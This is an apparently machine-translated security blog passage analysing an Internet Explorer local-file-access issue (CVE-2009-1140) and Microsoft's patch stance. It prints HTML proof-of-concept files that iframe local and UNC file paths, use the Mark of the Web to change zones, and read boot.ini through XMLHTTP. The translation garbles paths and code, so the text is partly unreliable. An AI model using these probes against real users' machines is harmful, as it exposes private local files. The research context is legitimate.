From the patch perspective

5up3rh3iblog
In the previous blog :《8-mounted CVE-2009-1140"CVE-2009-1140And80sec reported a local file probing Problem[Details of this issue have been published on wooyun].

From ms's appreciation for the CVE-2009-1140 patch method and 80 sec vulnerability reports, they look at the CVE-2009-1140 from the perspective of object tags on non-html file parsing issues:

<Object data = "index. dat" type = "text/html" width = "100%" height = "50"> </object>

[Look at this vulnerability from the ms perspective, then the vulnerability should at least as early as 10 years ago on the patch (MS00-055)...]

The issue file detection reported by 80sec is considered to be: "This problem is caused by incorrect handling of external source files referenced by IE. In addition, the key call method for the above vulnerability is file: // uncpath, but it is not considered as a "Vulnerability "....


The file: // uncpath method is not considered a "Vulnerability". Let's test it as follows:

Save the file c: est.htm:

<Html>
<Head>
<Title> test.htm </title>
</Head>
<Body>
Test.htm
</Body>
</Html>

Save the file c: est1.htm:

<Html>
<Head>
<Title> test1.htm </title>
<! -- Save from url = (0014) about: internet -->
</Head>
<Body>
Test1.htm
</Body>
</Html>

Save the file c: est2.htm:

<Html>
<Head>
<Title> test2.htm </title>
<! -Saved from url = (0016) http: // localhost -->
</Head>
<Body>
Test2.htm
</Body>
</Html>

Save the file http: // 192.168.1.101/ie7/iframe.htm

<Html>
<Head>
<Title> iframe.htm </title>
</Head>
<Body>
File: // 127.0.0.1/c $/test.htm <br>
<Iframe src = "file: // 127.0.0.1/c $/test.htm"> </iframe>
<Br> file: // c:/test.htm <br>
<Iframe src = "file: // c:/test.htm"> </iframe>
<Br> file: // c:/test1.htm <br>
<Iframe src = "file: // c:/test1.htm"> </iframe>
<Br> file: // c:/test2.htm <br>
<Iframe src = "file: // c:/test2.htm"> </iframe>
</Body>
</Html>

Let's see the "<! -- Saved from url = (0014) about: internet --> ", details: aspx" target = _ blank>Http://msdn.microsoft.com/ch/library/ms537628%28VS.85%29.aspx

The Mark of the Web (MOTW) is a feature of Windows Internet Explorer that enhances security by enabling Internet Explorer to force Web pages to run in the security zone of the location the page was saved from-as long as that security zone is more restrictive than the Local Machine zone-instead of the Local Machine zone. the role of the MOTW is more prominent with Microsoft Internet Explorer 6 for Windows XP Service Pack 2 (SP2) because of increased security restrictions in the Local Machine zone. when you are developing Web content, the MOTW enables you to test your active HTML documents in the security zone where you intend the pages to run. adding the MOTW to your Web pages also enables you to fully test their compatibility with users security settings.

This is a security policy introduced by ie6 SP2. you can set the domain for accessing the HTML file, and the test1.htm domain for accessing the file is specified as an internet domain.


From the above access results, we can see that the file: // c: // method can access test1.htm and test2.htm files marked as "Local Intranet Zone" and "Intranet zonefolder", but not test.htm without motw. in addition, the file: // unc method is successfully accessed.

If you only access the service, you may think this will not bring security issues, so let's continue the test:

Save the file c: xhr.htm:

<Html>
<Head>
<Title> xhr.htm </title>
<! -- Save from url = (0014) about: internet -->
</Head>
<Body>
<Script>
Xmlhttp = new ActiveXObject ("Msxml2.XMLHTTP. 3.0 ");
Xmlhttp. open ("GET", "boot. ini", false );
Xmlhttp. send ();
Document. write (xmlhttp. responseText );
</Script>
</Body>
</Html>

Save the file http: // 192.168.1.101/ie7/iframe-1.htm:

<Html>
<Head>
<Title> iframe-1.htm </title>
</Head>
<Body>
File: // 127.0.0.1/c $/xhr.htm <br>
<Iframe src = "file: // 127.0.0.1/c $/xhr.htm"> </iframe>
<Br> file: // c:/xhr.htm <br>
<Iframe src = "file: // c:/xhr.htm"> </iframe>
</Body>
</Html>


Obviously, c: oot. ini and file: // c:/are read through file: // unc xmlhttp, which means access is denied. In the above test, if the ms processing method starts with an article, it should be regarded as an xml http "Vulnerability "???